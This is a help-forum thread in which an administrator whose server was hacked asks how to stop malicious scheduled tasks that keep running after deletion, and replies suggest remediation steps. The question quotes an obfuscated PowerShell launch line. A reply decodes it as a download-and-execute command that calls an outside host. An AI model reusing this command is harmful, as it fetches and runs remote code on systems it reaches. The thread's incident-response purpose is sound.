locked
Deleted schedule tasks are still being performed RRS feed

  • Question

  • My Server hacked by others. 

    there are some schedule taks run powershell command . I delete all of them. But those task still running. what should i do?

    here is the power shell command

    HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAHkANgBoAC4AbgBlAHQALwBnAD8AaAAxADkAMAAzADIAMQAnACkA

    • Edited by Chivas_Tan Wednesday, April 3, 2019 5:10 AM
    Wednesday, April 3, 2019 5:04 AM

Answers

  • Yes, I resolved it my self.

    that powershell script download script from a website.the script will create some schedule tasks to run powershell script .although i deleted all schedule task .but those task still runing . I modify HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule\Start to 4 to disable schedule task service ,restart my server, clean HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache, recover HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule\Start to 2 to run schedule task service .

    those task deleted  stop running again.


    ...

    • Marked as answer by Chivas_Tan Wednesday, April 10, 2019 2:43 PM
    Wednesday, April 10, 2019 2:43 PM

All replies

  • Hello, Can you try stopping and disabling “Task Scheduler service”, if you think they are still running. Sorry I am not able to understand the language in above screenprint

    If you find this post helpfull, please give “Helpfull” vote. Please remember to mark the replies as answers if they help


    Wednesday, April 3, 2019 1:29 PM
  • Thank you. That screenprint is taskschd. There is a schedule task name 00-15-4d-00-99-75. I had delete it.

    but that task still running.


    ...

    Thursday, April 4, 2019 7:12 AM
  • Hi Chivas, Did you tried disabling the service?

    If you find this post helpfull, please give “Helpfull” vote. Please remember to mark the replies as answers if they help

    Thursday, April 4, 2019 9:31 AM
  • Hi,

    Thanks for your question.

    I don't think it is a PowerShell command. 

    -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFc

    AZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AH

    IAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAHkANgBoAC4AbgBlAHQ

    ALwBnAD8AaAAxADkAMAAzADIAMQAnACkA

    What is the role of this long string of alphanumeric characters?

    Best regards,

    Lee


    Just do it.

    Friday, April 5, 2019 8:38 AM
  • If it has been compromised, just backup your data. And start from scratch.

    Every second counts..make use of it. Disclaimer: This posting is provided AS IS with no warranties or guarantees and confers no rights.

    Friday, April 5, 2019 9:59 AM

  • I don't think it is a PowerShell command. 


    It's base 64 encoded. It translates to this. 

    IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?h190321')

    Friday, April 5, 2019 12:41 PM
  • Here is a similar thread. https://social.technet.microsoft.com/Forums/en-US/f2def74e-28f5-4532-8491-25c19b707575/need-help-figuring-out-why-eventlog-keeps-clearing?forum=ws2016

    Run this Powershell command to see if the malware is hidden inside of WMI.

    Get-WMIObject -List| Where{$_.name -match "powershell"}

    Malwarebytes worked for the other user, but as others have noted here, rebuilding your system is the safest way to get rid of the virus.  

    Friday, April 5, 2019 1:16 PM
  • Hi,

    Was your issue resolved?

    If you resolved it using our solution, please "mark it as answer" to help other community members find the helpful reply quickly.

    If you resolve it using your own solution, please share your experience and solution here. It will be very beneficial for other community members who have similar questions.

    If no, please reply and tell us the current situation in order to provide further help.

    Best Regards,

    Lee


    Just do it.

    Monday, April 8, 2019 8:49 AM
  • Yes, I resolved it my self.

    that powershell script download script from a website.the script will create some schedule tasks to run powershell script .although i deleted all schedule task .but those task still runing . I modify HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule\Start to 4 to disable schedule task service ,restart my server, clean HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache, recover HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule\Start to 2 to run schedule task service .

    those task deleted  stop running again.


    ...

    • Marked as answer by Chivas_Tan Wednesday, April 10, 2019 2:43 PM
    Wednesday, April 10, 2019 2:43 PM